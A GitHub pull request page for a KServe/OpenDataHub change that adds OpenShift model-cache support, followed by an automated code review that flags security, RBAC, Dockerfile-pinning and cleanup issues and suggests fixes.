modelcache modifications for ODH/Openshift #1190

Closed
VedantMahabaleshwarkar wants to merge 5 commits into opendatahub-io:master from VedantMahabaleshwarkar:modelcachev2odhmaster

Conversation


@VedantMahabaleshwarkar VedantMahabaleshwarkar commented Mar 12, 2026

What this PR does / why we need it:

Fixes https://issues.redhat.com/browse/RHOAIENG-41859, https://issues.redhat.com/browse/RHOAIENG-41858

Feature/Issue validation/testing:

Testing steps followed : https://gist.github.com/VedantMahabaleshwarkar/671eefd47a8a7c1abfcd09063c0c8350

Checklist:

  • Have you added unit/e2e tests that prove your fix is effective or that this feature works?
  • Has code been commented, particularly in hard-to-understand areas?
  • Have you made corresponding changes to the documentation?
  • Have you linked the JIRA issue(s) to this PR?

Summary by CodeRabbit

Release Notes

  • New Features

    • Added OpenShift-specific overlay with security context constraints and CA injection support.
    • Introduced permission fix image configuration for handling filesystem permission issues.
    • Added filesystem writability detection and automatic permission remediation.
  • Chores

    • Updated storage mount path standardization.
    • Enhanced RBAC permissions for resource finalizers and persistent volume management.
    • Updated security context handling for restricted environments.

The cherry-pick of 929ff6a introduced the ImagePullSecrets test inside
a Context("When creating an inference service with modelcar and raw
deployment") block, but the ODH fork already had the same test as a
standalone It() at the top level. Both used the same resource names
(serviceName "modelcar-raw-deployment", runtime "vllm-runtime"), causing
the second test to fail with a resource collision when running the full
suite.

Remove the standalone duplicate, keeping the Context-wrapped version
from upstream.

Signed-off-by: Vedant Mahabaleshwarkar <vmahabal@redhat.com>

openshift-ci bot commented Mar 12, 2026

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: VedantMahabaleshwarkar

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Details Needs approval from an approver in each of these files:
  • OWNERS [VedantMahabaleshwarkar]

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment


coderabbitai bot commented Mar 12, 2026

📝 Walkthrough

Walkthrough

This pull request introduces OpenShift-specific deployment infrastructure for KServe's local model feature, including new SecurityContextConstraints, RBAC rules for finalizers and persistent volume access, and refactored storage path handling. Key changes include: mount path redirection from /mnt/models to /var/lib/kserve, addition of a permission-fix job mechanism to handle non-writable filesystems with SELinux context adjustments, namespace-scoped PVC creation for model downloads, Dockerfile user privilege enforcement (root during build, non-root at runtime), and expanded RBAC permissions for persistent volume/claim operations and finalizer management. Python and Go APIs are updated to include a new permissionFixImage configuration field.

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

Issues

Security: Unsafe SELinux MCS level extraction — In pkg/controller/v1alpha1/localmodelnode/controller.go, the getProcessMCSLevel() function reads /proc/self/attr/current and extracts the MCS level via string splitting without validation. The returned value is directly interpolated into a shell chcon command without sanitization. If parsing is incorrect or the format differs, injected shell metacharacters could execute arbitrary commands. Validate and escape the MCS level before use; consider using SELinux library bindings instead of shell commands.

Security: Privilege escalation via permission-fix job — The new launchPermissionFixJob() creates a Job running as root with elevated capabilities and arbitrary volume mounts. While guarded by isWritable() checks, the mechanism assumes the /proc/self/attr/current read and MCS parsing are trustworthy. An attacker controlling node environment variables or cgroup namespaces could influence MCS level parsing. Add explicit validation of MCS format (must match pattern like c[0-9]+\.c[0-9]+ or similar) before passing to chcon. Verify the Job's SecurityContext does not grant unintended NET_ADMIN or other dangerous capabilities.
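The MCS validation both findings call for can be sketched as follows. This is a minimal illustration, not the controller's actual code: the function name `sanitizeMCSLevel` and the exact accepted pattern are assumptions, and the pattern should be confirmed against real `/proc/self/attr/current` output before use.

```go
package main

import (
	"fmt"
	"regexp"
)

// validMCSLevel is a hypothetical allowlist pattern for SELinux MCS levels
// such as "s0:c26,c13"; the bare sensitivity ("s0") is also accepted.
var validMCSLevel = regexp.MustCompile(`^s[0-9]+(:c[0-9]+(,c[0-9]+)*)?$`)

// sanitizeMCSLevel rejects anything that could smuggle shell metacharacters
// into the chcon invocation built by the permission-fix job.
func sanitizeMCSLevel(raw string) (string, error) {
	if !validMCSLevel.MatchString(raw) {
		return "", fmt.Errorf("unexpected MCS level %q", raw)
	}
	return raw, nil
}

func main() {
	for _, level := range []string{"s0:c26,c13", "s0", "c26; rm -rf /"} {
		if _, err := sanitizeMCSLevel(level); err != nil {
			fmt.Println("rejected:", level)
		} else {
			fmt.Println("accepted:", level)
		}
	}
}
```

Even with validation in place, building the command with exec-style argument lists (rather than a shell string) remains the stronger defense, as the finding notes.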

Data integrity: Breaking PVC path change — Storage initializer path construction changed from pvc://{pvcName}/models/{storageKey}{subPath} to pvc://{pvcName}/{storageKey}{subPath}, removing the /models/ segment. Existing PVCs with data stored under /models/ will be inaccessible after this change. No migration logic is provided. Verify all deployed instances have empty or remapped storage, or provide a migration utility/documentation. This is a breaking change requiring operator intervention.

Concurrency: Finalizer cleanup without retry logic — RBAC rules for localmodelcaches/finalizers, localmodelnamespacecaches/finalizers, and localmodelnodes/finalizers are added, but no corresponding finalizer removal logic is evident in the diffs. If a finalizer is set but the removal code fails silently, resources will leak and block deletion indefinitely (CWE-416: Use After Free / resource leak). Ensure all controllers that set finalizers implement robust removal handlers and test deletion under failure conditions.

Configuration: Conflicting overlay entries in config/overlays/odh/params.yaml: the file adds a second entry for the same image path targeting DaemonSet kind alongside the existing Deployment entry. Kustomize behavior with duplicate paths and different kinds is order-dependent and error-prone. Consolidate into a single replacement rule or use distinct paths for each kind to avoid silent override issues.

Operations: PVC namespace scoping adds operational complexity — PVCs are now created in a configurable jobNamespace rather than the LocalModel's namespace. If jobNamespace and LocalModel namespaces differ, cleanup and multi-tenancy isolation becomes fragile. Ensure finalizers properly clean up PVCs across namespace boundaries, and document the namespace lifecycle expectations. Test scenarios where jobNamespace is deleted before LocalModel resources.

Security: Non-root Dockerfile user change may break existing mounts — Adding USER 1000:1000 in Dockerfile final stages changes runtime identity. If init or runtime code relies on root privilege (e.g., for device access, package installation, or ownership changes), this will silently fail at runtime. Audit entrypoint scripts and init processes for hardcoded root assumptions. The permission-fix job is a compensating control but should not mask upstream privilege assumption violations.

Testing: Large test removal without explanation — Two large test cases in pkg/controller/v1beta1/inferenceservice/rawkube_controller_test.go validating ImagePullSecrets handling were removed (~137 lines). No new tests replace this coverage. Ensure ImagePullSecrets functionality is still tested elsewhere or restore these cases; this appears to be an unintentional deletion.

🚥 Pre-merge checks | ✅ 1 | ❌ 1

❌ Failed checks (1 inconclusive)

Title check: ❓ Inconclusive. The PR title is vague and does not clearly convey the primary changes; it uses the generic term 'modifications' without specifying what was modified or why. Resolution: revise the title to be more specific and descriptive, e.g., 'Add OpenShift-specific localmodel deployment with PV/PVC and security context support' or similar that reflects the core intent of the changeset.
✅ Passed checks (1 passed)
Description check: ✅ Passed. Check skipped: CodeRabbit's high-level summary is enabled.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

📝 Coding Plan
  • Generate coding plan for human review comments

Comment @coderabbitai help to get the list of available commands and usage tips.

Tip

You can make CodeRabbit's review stricter and more nitpicky using the `assertive` profile, if that's what you prefer.

Change the reviews.profile setting to assertive to make CodeRabbit nitpick more issues in your PRs.


@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 16

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (6)
pkg/controller/v1alpha1/localmodel/controller_test.go (1)

914-948: ⚠️ Potential issue | 🟠 Major

Assert cross-namespace PVC cleanup after delete.

Line 914 moves the download PVC into modelCacheNamespace, so this test no longer exercises a same-namespace child. The current assertions only prove that the CR disappears; they still pass if the finalizer leaks the PVC in the job namespace. Add a post-delete Eventually(... IsNotFound(err)) for pvcLookupKey so the test covers the only valid cleanup path here.

Suggested change
 			// Now delete the LocalModelNamespaceCache
 			Expect(k8sClient.Delete(ctx, cachedModel)).Should(Succeed())

 			Eventually(func() bool {
 				err := k8sClient.Get(ctx, modelLookupKey, cachedModel)
 				return err != nil && errors.IsNotFound(err)
 			}, timeout, interval).Should(BeTrue(), "LocalModelNamespaceCache should be deleted after finalizer cleanup")
+
+			Eventually(func() bool {
+				err := k8sClient.Get(ctx, pvcLookupKey, persistentVolumeClaim)
+				return err != nil && errors.IsNotFound(err)
+			}, timeout, interval).Should(BeTrue(), "Download PVC should be deleted by finalizer cleanup")
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodel/controller_test.go` around lines 914 -
948, The test currently moves the download PVC into modelCacheNamespace
(pvcLookupKey) but only asserts the CR deletion, so it doesn't verify the PVC
was cleaned up; after deleting cachedModel and asserting the CR is gone, add an
Eventually assertion that attempts to Get the PVC via pvcLookupKey
(persistentVolumeClaim) and expects errors.IsNotFound(err) to be true, ensuring
the PVC is deleted; use the same timeout/interval and k8sClient.Get(ctx,
pvcLookupKey, persistentVolumeClaim) pattern as earlier to avoid race
conditions.
python/kserve/kserve/models/v1beta1_local_model_config.py (1)

71-99: ⚠️ Potential issue | 🟠 Major

Do not insert permission_fix_image before reconcilation_frequency_in_secs in the public constructor.

This breaks backward compatibility for positional callers of V1beta1LocalModelConfig(...). External SDK users passing reconcilation_frequency_in_secs as the 8th positional argument will have that value silently bind to permission_fix_image instead, leaving the reconciliation frequency unset without error. Move permission_fix_image after reconcilation_frequency_in_secs to preserve positional argument semantics.

Suggested fix
-    def __init__(self, default_job_image=None, disable_volume_management=None, enabled=False, fs_group=None, job_namespace='', job_ttl_seconds_after_finished=None, permission_fix_image=None, reconcilation_frequency_in_secs=None, local_vars_configuration=None):  # noqa: E501
+    def __init__(self, default_job_image=None, disable_volume_management=None, enabled=False, fs_group=None, job_namespace='', job_ttl_seconds_after_finished=None, reconcilation_frequency_in_secs=None, permission_fix_image=None, local_vars_configuration=None):  # noqa: E501
@@
-        if permission_fix_image is not None:
-            self.permission_fix_image = permission_fix_image
         if reconcilation_frequency_in_secs is not None:
             self.reconcilation_frequency_in_secs = reconcilation_frequency_in_secs
+        if permission_fix_image is not None:
+            self.permission_fix_image = permission_fix_image
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/models/v1beta1_local_model_config.py` around lines 71 -
99, The constructor V1beta1LocalModelConfig.__init__ currently places the
parameter permission_fix_image before reconcilation_frequency_in_secs which
breaks positional-argument compatibility; reorder the parameters so
reconcilation_frequency_in_secs appears before permission_fix_image in the
method signature and move the corresponding conditional assignment block (the if
reconcilation_frequency_in_secs ... and if permission_fix_image ...) so
reconcilation_frequency_in_secs is checked/assigned prior to
permission_fix_image, ensuring the attribute names
_reconcilation_frequency_in_secs and _permission_fix_image (and their public
setters default_job_image, disable_volume_management, enabled, fs_group,
job_namespace, job_ttl_seconds_after_finished) remain unchanged.
localmodel-agent.Dockerfile (1)

22-25: ⚠️ Potential issue | 🟠 Major

Pin go-licenses to a specific version.

CWE-494: @latest fetches an unpinned upstream binary on every build. Since this tool gates license compliance, a compromised release or supply-chain attack silently bypasses security controls and breaks build reproducibility. Pin to an immutable version.

Patch
-RUN go install github.com/google/go-licenses@latest
+RUN go install github.com/google/go-licenses@vX.Y.Z
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@localmodel-agent.Dockerfile` around lines 22 - 25, The Dockerfile currently
installs go-licenses with an unpinned reference ("go install
github.com/google/go-licenses@latest"), which allows supply-chain changes and
breaks reproducibility; change that invocation to a pinned, immutable version
(replace `@latest` with a specific release tag or module version/commit hash) and
rebuild using that pinned version so the subsequent uses of
/opt/app-root/src/go/bin/go-licenses (the check and save commands) run a known,
fixed binary; ensure the chosen tag is a stable release (e.g., a vX.Y.Z tag or
commit SHA) and update any documentation or build notes to document the pinned
version.
localmodel.Dockerfile (1)

22-25: ⚠️ Potential issue | 🟠 Major

Pin go-licenses to a specific version instead of @latest.

CWE-494: Non-pinned dependency enables supply-chain attacks. Each build resolves a different upstream release; a compromised or updated version of go-licenses can bypass license checks or corrupt the build. Use an explicit version or commit hash.

Patch
+ARG GO_LICENSES_VERSION=vX.Y.Z
-RUN go install github.com/google/go-licenses@latest
+RUN go install github.com/google/go-licenses@${GO_LICENSES_VERSION}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@localmodel.Dockerfile` around lines 22 - 25, The Dockerfile currently
installs go-licenses with an unpinned version ("go install
github.com/google/go-licenses@latest"); replace `@latest` with a specific, audited
release tag or commit hash (e.g., a vX.Y.Z tag or a commit SHA) so the build is
reproducible and not vulnerable to supply-chain changes; update the installation
line that produces /opt/app-root/src/go/bin/go-licenses and any related build
docs to reference the chosen pinned version and, if desired, add a short comment
with the upstream release URL or checksum for future audits.
config/localmodelnodes/manager.yaml (1)

65-69: ⚠️ Potential issue | 🟡 Minor

hostPath volume presents container escape risk.

Per coding guidelines, hostPath mounts should be avoided. While this may be intentional for caching models on the node filesystem, consider:

  1. An attacker with container access could potentially read/write arbitrary host files if path escapes occur.
  2. The path /models is writable (readOnly: false on line 57).

If hostPath is required, ensure the OpenShift SCC or PodSecurityPolicy restricts which paths can be mounted. The overlay's PVC-backed approach (localmodelnode-pv-pvc.yaml) is preferable when feasible.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/localmodelnodes/manager.yaml` around lines 65 - 69, The hostPath
volume under volumes with hostPath.path "/models" and readOnly false introduces
a container escape risk; replace it with a PVC-backed volume (use the existing
localmodelnode-pv-pvc.yaml pattern) and mount that PVC instead of hostPath, or
if hostPath is absolutely required, make the mount readOnly, add explicit path
restrictions via OpenShift SCC/PodSecurityPolicy, and document the security
rationale; update the volume declaration and any references to the "models"
volume accordingly (e.g., in the pod spec that mounts "models").
charts/kserve-localmodel-resources/files/resources.yaml (1)

126-135: ⚠️ Potential issue | 🟠 Major

Cluster-wide secrets read access is overly permissive (CWE-732).

The kserve-localmodelnode-agent-role ClusterRole grants get, list, watch on secrets across all namespaces. The controller code only accesses secrets within a specific job namespace—jobNamespace from the LocalModelNodeReconciler configuration. Tighten permissions by converting to a Role scoped to that namespace, or restrict to specific secret names via resourceNames.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@charts/kserve-localmodel-resources/files/resources.yaml` around lines 126 -
135, The ClusterRole kserve-localmodelnode-agent-role currently allows
cluster-wide get/list/watch on secrets; restrict this by either (A) converting
this ClusterRole into a namespaced Role in resources.yaml scoped to the
reconciler's jobNamespace (the namespace used by LocalModelNodeReconciler) and
update the corresponding RoleBinding to bind in that namespace, or (B) keep it
as a ClusterRole but replace the broad "secrets" resource permission with a
resourceNames list containing only the specific secret names the controller
reads (derived from jobNamespace configuration), ensuring verbs remain limited
to get/list/watch. Locate kserve-localmodelnode-agent-role in resources.yaml and
apply one of these fixes and adjust bindings accordingly.
🧹 Nitpick comments (9)
pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go (3)

116-130: Error handling logs but continues, leaving partial state.

When CreatePV (line 116-118) or CreatePVC (line 128-130) fails, the error is logged but execution continues to the next iteration or subsequent steps. This can leave the system in an inconsistent state where a PV exists without its corresponding PVC, or vice versa.

Consider returning the error to trigger a requeue, allowing the reconciler to retry the entire operation:

♻️ Proposed fix to propagate errors
 	for _, nodeGroup := range nodeGroups {
 		pvSpec := nodeGroup.Spec.PersistentVolumeSpec
 		pv := corev1.PersistentVolume{Spec: pvSpec, ObjectMeta: metav1.ObjectMeta{
 			Name: localModel.Name + "-" + nodeGroup.Name + "-" + localModel.Namespace + "-download",
 		}}
 		if err := CreatePV(ctx, c.Clientset, c.Scheme, c.Log, pv, nil, localModel); err != nil {
 			c.Log.Error(err, "Create PV err", "name", pv.Name)
+			return ctrl.Result{}, err
 		}

 		pvc := corev1.PersistentVolumeClaim{
 			ObjectMeta: metav1.ObjectMeta{
 				Name: localModel.Name + "-" + nodeGroup.Name + "-" + localModel.Namespace + "-download",
 			},
 			Spec: nodeGroup.Spec.PersistentVolumeClaimSpec,
 		}
 		pvc.Spec.VolumeName = pv.Name

 		if err := CreatePVC(ctx, c.Clientset, c.Scheme, c.Log, pvc, localModelConfig.JobNamespace, nil, localModel); err != nil {
 			c.Log.Error(err, "Create PVC err", "name", pvc.Name)
+			return ctrl.Result{}, err
 		}
 	}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`
around lines 116 - 130, The CreatePV/CreatePVC calls log errors but continue,
leaving partial state; change the reconciler to propagate failures by returning
the error (instead of only logging) so the controller will requeue and retry;
specifically, in the block that calls CreatePV(ctx, c.Clientset, c.Scheme,
c.Log, pv, nil, localModel) and the subsequent CreatePVC(ctx, c.Clientset,
c.Scheme, c.Log, pvc, localModelConfig.JobNamespace, nil, localModel) handle
non-nil err by returning that err (or a wrapped contextual error including
pv.Name/pvc.Name) from the reconcile function so the operation is aborted and
retried rather than proceeding.

128-128: No validation of JobNamespace before use.

localModelConfig.JobNamespace is used directly without checking if it's empty or valid. If misconfigured, this could create PVCs in an unintended namespace (e.g., the default namespace if empty string is treated as default).

🛡️ Proposed defensive check
+	if localModelConfig.JobNamespace == "" {
+		c.Log.Error(nil, "JobNamespace is not configured in localModelConfig")
+		return ctrl.Result{}, fmt.Errorf("JobNamespace must be configured for namespace-scoped local model cache")
+	}
+
 	// Step 3 - Creates PV & PVC for model download (in jobNamespace, same as cluster-scoped)
 	for _, nodeGroup := range nodeGroups {

Note: You'd need to add "fmt" to imports.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`
at line 128, The code calls CreatePVC with localModelConfig.JobNamespace without
validating it; add a defensive check before that call in the reconciler to
ensure localModelConfig.JobNamespace is non-empty and a valid namespace (e.g.,
if empty, either set it to localModel.Namespace or return an error), and if
invalid return/record a clear error (use c.Log.Errorf or return fmt.Errorf)
rather than proceeding to CreatePVC; update imports to include fmt if you use
fmt.Errorf.

106-108: Error from ReconcileLocalModelNode is logged but not returned.

Similar to the PV/PVC creation, if ReconcileLocalModelNode fails, the error is logged but execution continues. This may cause subsequent steps (PV/PVC creation) to proceed despite the node reconciliation failing.

♻️ Proposed fix
 	// Step 2 - Adds this model to LocalModelNode resources in the node group
 	if err := ReconcileLocalModelNode(ctx, c.Client, c.Log, nil, localModel, nodeGroups); err != nil {
 		c.Log.Error(err, "failed to reconcile LocalModelNode for namespace cache")
+		return ctrl.Result{}, err
 	}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`
around lines 106 - 108, The call to ReconcileLocalModelNode currently logs
errors but does not stop reconciliation, allowing downstream PV/PVC creation to
run even on failure; change the block in localmodelnamespacecache_reconciler.go
so that if ReconcileLocalModelNode(ctx, c.Client, c.Log, nil, localModel,
nodeGroups) returns an error you both log it and return the error (or wrap it)
from the surrounding reconcile method instead of continuing, ensuring the
reconcile function (the caller) stops and propagates the failure.
pkg/apis/serving/v1beta1/configmap.go (2)

391-400: Inconsistent error handling compared to sibling functions.

Other New*Config functions wrap unmarshalling errors with context (e.g., NewIngressConfig at line 303). This function returns the raw error, making debugging harder.

♻️ Suggested fix
 func NewLocalModelConfig(isvcConfigMap *corev1.ConfigMap) (*LocalModelConfig, error) {
 	localModelConfig := &LocalModelConfig{}
 	if localModel, ok := isvcConfigMap.Data[LocalModelConfigName]; ok {
 		err := json.Unmarshal([]byte(localModel), &localModelConfig)
 		if err != nil {
-			return nil, err
+			return nil, fmt.Errorf("unable to parse localModel config json: %w", err)
 		}
 	}
 	return localModelConfig, nil
 }
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/apis/serving/v1beta1/configmap.go` around lines 391 - 400, The
NewLocalModelConfig function returns raw JSON unmarshal errors while sibling
constructors like NewIngressConfig wrap errors with context; update
NewLocalModelConfig to wrap the error from json.Unmarshal with a descriptive
message (include LocalModelConfigName and that it failed to parse into
LocalModelConfig) before returning so callers get context, mirroring the
error-wrapping pattern used by NewIngressConfig and other New*Config functions.

172-172: Validate PermissionFixImage after unmarshalling (CWE-20: Improper Input Validation).

PermissionFixImage is unmarshalled from ConfigMap data without validation, violating the requirement to validate all data from json.Unmarshal before use. Attacker-controlled image references can trigger unauthorized registry pulls or supply chain attacks. Validate image reference format and implement an allowlist of permitted registries.

♻️ Suggested validation
// Add validation function
func validateContainerImageRef(image string) error {
	if image == "" {
		return nil // optional field
	}
	// Reject unsafe characters; consider using distribution/reference for canonical validation
	if strings.ContainsAny(image, " \t\n\r") {
		return fmt.Errorf("image reference contains invalid characters: %q", image)
	}
	return nil
}

Then in NewLocalModelConfig:

 func NewLocalModelConfig(isvcConfigMap *corev1.ConfigMap) (*LocalModelConfig, error) {
 	localModelConfig := &LocalModelConfig{}
 	if localModel, ok := isvcConfigMap.Data[LocalModelConfigName]; ok {
 		err := json.Unmarshal([]byte(localModel), &localModelConfig)
 		if err != nil {
 			return nil, err
 		}
+		if err := validateContainerImageRef(localModelConfig.PermissionFixImage); err != nil {
+			return nil, fmt.Errorf("invalid localModel config: %w", err)
+		}
+		if err := validateContainerImageRef(localModelConfig.DefaultJobImage); err != nil {
+			return nil, fmt.Errorf("invalid localModel config: %w", err)
+		}
 	}
 	return localModelConfig, nil
 }
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/apis/serving/v1beta1/configmap.go` at line 172, Add validation for the
PermissionFixImage field after unmarshalling by implementing a
validateContainerImageRef(image string) error helper and invoking it in
NewLocalModelConfig to reject unsafe image references and enforce an allowlist
of permitted registries; specifically, have validateContainerImageRef return nil
for empty (optional) values, reject whitespace or control characters and other
unsafe characters, verify the registry host is in your allowlist, and
propagate/return an error from NewLocalModelConfig if validation fails so
callers can refuse untrusted ConfigMap input.
pkg/controller/v1alpha1/localmodelnode/controller_test.go (1)

1456-1539: This spec only covers the non-SELinux fallback path.

In envtest getProcessMCSLevel() is usually empty, so this never exercises the branch that production OpenShift nodes are likely to take. Make the MCS reader injectable so the test can force a non-empty /proc/self/attr/current result and catch cross-namespace label bugs.

As per coding guidelines: test coverage/quality for changed or critical paths.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/controller_test.go` around lines 1456
- 1539, The test only exercises the non-SELinux fallback because
getProcessMCSLevel() reads /proc and can't be controlled in envtest; make the
MCS reader injectable by refactoring getProcessMCSLevel into a function variable
or dependency (e.g., add a field mcsReader func() (string, error) on the
reconciler or a package-level var getProcessMCSLevelFunc) and use that in the
code path that builds the permission-fix Job, then update the test "Should
include MCS level in permission fix job chcon command" to set the injected
reader to return a non-empty value like "s0:c28,c27" (and restore it after the
test) so the Job command includes "-l <mcs>" and the test exercises the SELinux
branch.
pkg/controller/v1alpha1/localmodelnode/file_utils.go (1)

82-90: Use os.CreateTemp() for temporary probe files instead of fixed .write-test filename.

While this is a per-node local cache directory (not shared storage), temporary files should still use randomized names via os.CreateTemp() to follow Go best practices and avoid potential conflicts if the probe is called concurrently or during testing.

Suggested fix
 func (f *FileSystemHelper) isWritable() bool {
-	testFile := filepath.Join(f.modelsRootFolder, ".write-test")
-	file, err := os.Create(testFile) //nolint:gosec // G304: test file in controlled directory
+	file, err := os.CreateTemp(f.modelsRootFolder, ".write-test-*")
 	if err != nil {
 		return false
 	}
-	_ = file.Close()
-	_ = os.Remove(testFile)
+	name := file.Name()
+	if err := file.Close(); err != nil {
+		_ = os.Remove(name)
+		return false
+	}
+	if err := os.Remove(name); err != nil {
+		return false
+	}
 	return true
 }
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/file_utils.go` around lines 82 - 90,
Replace the fixed probe file in FileSystemHelper.isWritable with a randomized
temp file: use os.CreateTemp(f.modelsRootFolder, ".write-test-*") to create the
temp file (capture file and err), close and remove it, and return false on any
error; update the function name reference (isWritable on FileSystemHelper)
accordingly and ensure cleanup happens even on close/remove errors so concurrent
probes won't conflict.
config/overlays/odh-with-modelcache/localmodel-scc.yaml (1)

19-20: seLinuxContext: RunAsAny is permissive.

Consider MustRunAs with an appropriate SELinux type (e.g., container_runtime_t) for defense-in-depth on OpenShift. RunAsAny allows pods to run with any SELinux context, weakening mandatory access controls.

Proposed refinement
 seLinuxContext:
-  type: RunAsAny
+  type: MustRunAs
+  seLinuxOptions:
+    type: container_t
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/odh-with-modelcache/localmodel-scc.yaml` around lines 19 -
20, Replace the permissive seLinuxContext type value "RunAsAny" with a stricter
setting by updating the seLinuxContext block to use "MustRunAs" and specify an
appropriate SELinux type (for example "container_runtime_t" or another
cluster-approved type); locate the seLinuxContext section and change the type
field accordingly so the SCC enforces the chosen SELinux context instead of
allowing any.
charts/kserve-localmodel-resources/files/resources.yaml (1)

394-409: Base chart uses hostPath mount — acceptable if overlay replaces it.

The DaemonSet mounts hostPath /models at /var/lib/kserve. Per coding guidelines, hostPath mounts are a security concern. However, the ODH overlay (config/overlays/odh-with-modelcache/kustomization.yaml lines 42-47) replaces this with a PVC.

For vanilla Kubernetes deployments using this base chart directly, the hostPath remains. Consider adding a comment or documentation noting that production OpenShift deployments should use the ODH overlay or configure persistent storage.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@charts/kserve-localmodel-resources/files/resources.yaml` around lines 394 -
409, The DaemonSet currently uses a hostPath volume named "models" mounted at
/var/lib/kserve (and serviceAccountName kserve-localmodelnode-agent), which can
be unsafe for production; add a clear inline YAML comment next to the
volumes/mount (or a short note in chart README) that this hostPath is intended
for local/dev use only and that production/OpenShift deployments should use the
odh-with-modelcache overlay (which replaces the hostPath with a PVC) or supply
their own persistent storage; ensure the comment references the "models" volume
name and the mountPath /var/lib/kserve so maintainers know exactly what to
replace.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@charts/kserve-localmodel-resources/files/resources.yaml`:
- Around line 143-152: DeletePVC/DeletePV currently log errors but always allow
the finalizer removal, risking orphaned PVC/PV; change the logic in the
DeletePVC and DeletePV flows so that on deletion failure you do not remove the
finalizer: either return the error to requeue the reconciliation loop (for
immediate retry) or implement exponential backoff and only clear the finalizer
after a confirmed successful deletion; additionally, before attempting deletion
check PVC status/claimRef (or use the pod controller reference check in the same
controller) to detect "in-use" (bound to pods) and if in-use, requeue or wait
until pods are terminated/released to avoid PVC stuck in Terminating — update
the code paths that remove the finalizer (the finalizer removal block) to only
run after successful delete confirmation or backoff success.

In `@config/overlays/odh-with-modelcache/localmodelnode-pv-pvc.yaml`:
- Around line 12-15: The PV currently uses hostPath (path:
/var/lib/kserve/models, type: DirectoryOrCreate) and references storageClassName
"local-storage" which is not defined in this repo; either add a StorageClass
manifest named "local-storage" (or switch to the standard "local" provisioner)
and document it in the deployment prerequisites, and ensure the PV manifest (the
resource referencing hostPath) includes node affinity limiting nodes to label
kserve/localmodel=worker, accessModes: ReadWriteOnce, and
persistentVolumeReclaimPolicy: Delete to match the intended mitigations;
alternatively replace the hostPath PV with a proper local PV/backing using the
local-volume-provisioner pattern rather than raw hostPath.

In `@config/overlays/odh/kustomization.yaml`:
- Line 19: The delete patch patches/remove-storagecontainer.yaml is placed in
the shared ODH overlay (odh) and will delete ClusterStorageContainer/default for
every ODH install; remove the reference from the odh kustomization and add that
single delete entry to the modelcache-specific overlay's kustomization instead
so the patch only applies when the modelcache overlay is selected (update the
odh kustomization to drop the path and add the path to the modelcache overlay
kustomization).

In `@config/overlays/odh/params.env`:
- Around line 14-15: The env entries kserve-localmodel-controller and
kserve-localmodelnode-agent point to personal mutable images
(quay.io/vedantm/...:latest); replace these with the official
quay.io/opendatahub/ image names and use immutable references (prefer pinned
digests or explicit semver tags) so production uses stable, auditable images;
update the values for kserve-localmodel-controller and
kserve-localmodelnode-agent accordingly and ensure the tags are not ":latest"
but a digest or specific version.
- Line 1: The env entry currently sets kserve-controller to a personal, unpinned
image "quay.io/vedantm/kserve-controller:latest"; update the value for the
kserve-controller variable to use the official registry image
"quay.io/opendatahub/kserve-controller" and avoid the :latest tag (prefer a
specific released tag) so the line becomes
kserve-controller=quay.io/opendatahub/kserve-controller[:<release-tag>] ensuring
the official image and a fixed tag are used.

In `@localmodel-agent.Dockerfile`:
- Line 2: The Dockerfile's builder image reference (the FROM line for the
"builder" stage) uses the mutable tag
"registry.access.redhat.com/ubi9/go-toolset:1.25"; replace this with the exact
image digest (e.g., registry.access.redhat.com/ubi9/go-toolset@sha256:<digest>)
to pin the builder image immutably. Fetch the authoritative digest for the
desired 1.25 image from Red Hat’s registry or official source, update the FROM
line to use that `@sha256` digest, and keep the "AS builder" alias intact.

In `@localmodel.Dockerfile`:
- Line 2: The Dockerfile uses a floating tag in the builder stage ("FROM
registry.access.redhat.com/ubi9/go-toolset:1.25 AS builder"); replace that tag
with an immutable digest by fetching the image's current sha256 digest from the
registry and updating the FROM line to use the image@sha256:<digest> form so the
builder stage is pinned; ensure you update the exact "FROM
registry.access.redhat.com/ubi9/go-toolset:1.25 AS builder" line to the
digest-based reference and commit the change.

In `@pkg/controller/v1alpha1/localmodel/reconcilers/utils.go`:
- Around line 236-249: The cleanup currently logs failures while deleting the
download PV/PVC and then proceeds to remove the finalizer; change this to return
any error encountered so reconcile is retried and finalizer not removed on
partial cleanup. In the block referencing DeletePV/DeletePVC and
v1beta1.GetInferenceServiceConfigMap/NewLocalModelConfig, propagate and return
errors from DeletePV and DeletePVC instead of only logging them, and for
DeletePVC use the job namespace value persisted on the LocalModel resource (e.g.
localModel.Spec.JobNamespace or the field used at creation) rather than
recomputing it from the current ConfigMap (remove reliance on
